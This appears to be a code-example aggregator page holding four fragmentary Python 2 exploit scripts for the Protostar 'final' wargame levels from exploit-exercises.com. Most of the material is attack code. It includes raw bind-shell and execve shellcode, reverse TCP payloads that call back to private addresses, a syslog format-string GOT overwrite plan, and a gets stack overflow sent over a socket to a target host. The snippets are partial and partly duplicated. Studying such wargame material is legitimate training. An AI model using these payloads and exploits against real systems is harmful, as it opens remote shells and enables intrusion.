Beispiel #1
0
#vector:
#1st chunk:
#[ FSRD | nop x 4 | nops + jmp | PPPP | nops + shellcode + / ]
#                                                            |
#                                                            |
#2nd chunk:                                                  |
#[ FSRD | ROOT | / + \xfc\xff\xff\xff +                      |
#                    \xfc\xff\xff\xff +                      |
#                    \x10\xd4\x04\x08 +                      |
#                    \x10\xe0\x04\x08 + \x00 | P A D D I N G ]
#                                                            |
#                                                           128

chusion = '\x90\x90\x90\x90\x90\xeb\x05\x90\x41\x41\x41\x41\x90\x90\x90\x90'

revtcp = shellgen.linux().reverse_tcp('192.168.2.52', 5555)

bind = "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a" +\
"\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68" + \
"\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1" + \
"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd" + \
"\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f" + \
"\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f" + \
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" + \
"\x41\xcd\x80\x90\x90\x90"

print 'len bind: ', len(bind)

print 'len revtcp: ', len(revtcp)

s = socket(AF_INET, SOCK_STREAM)
Beispiel #2
0
#exploit-exercises.com : Protostar : final1
# do:
#   I stage: get control program flow.
#
#       how: format string bug through syslog( pri, my_input )
#
#       _extrn [puts] <-- username addr (shellcode be here)
#
#   II stage: load shellcode into memory.
#
#       how: simple. send as username, then login.
#
# _extrn puts   = 0x0804A194
# username      = 0x0804A220

revtcp = shellgen.linux().reverse_tcp('192.168.2.56', 2222)

revtcp = '\x90' * 5 + revtcp
sh = '\x90' * 3 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

bind = shellgen.linux().bindport(1234)  #I use it

retloc = struct.pack(
    '<I', 0x0804A220)  #0xa220 --> 0x0804a194 & 0x10804 --> 0x0804a196

putsaddr = struct.pack('<I', 0x0804A194)  # \x94\xa1\x04\x08

user = '******'
login = '******' + '\n'

padding = '\xc3' * 3
Beispiel #3
0
# do:
#   I stage: get control program flow.
#
#       how: format string bug through syslog( pri, my_input )
#
#       _extrn [puts] <-- username addr (shellcode be here)
#
#   II stage: load shellcode into memory.
#
#       how: simple. send as username, then login.
#
# _extrn puts   = 0x0804A194
# username      = 0x0804A220


revtcp = shellgen.linux().reverse_tcp('192.168.2.56',2222)

revtcp = '\x90'*5 + revtcp
sh = '\x90'*3 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

bind = shellgen.linux().bindport(1234) #I use it

retloc = struct.pack('<I', 0x0804A220) #0xa220 --> 0x0804a194 & 0x10804 --> 0x0804a196

putsaddr = struct.pack('<I',0x0804A194) # \x94\xa1\x04\x08


user = '******' 
login = '******' + '\n'

Beispiel #4
0
#   I stage:
#       owerflow buff in stack through gets
#       redirect program flow to gets(my_buff) again
#       use my_buff as retaddr from gets
#
#   II stage: send shellcode
#       easy. without null-bytes ;)
#
#bss = 0x0804AE68
#data = 0x0804AE40
#printf = 0x0804987D
#gets = 0x08048AAC

junk = 532

rev = shellgen.linux().reverse_tcp('192.168.2.52',5555)
print 'shellcode len: ', len(rev)

print 'go'


printf = struct.pack('<I',0x0804987D) #to test owerflow

gets = struct.pack('<I',0x08048AAC)

data = struct.pack('<I', 0x0804AE40) #killall data_section :)

s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.2.26', 2995))

exp = 'A'*(junk) + gets + data + data + '\n'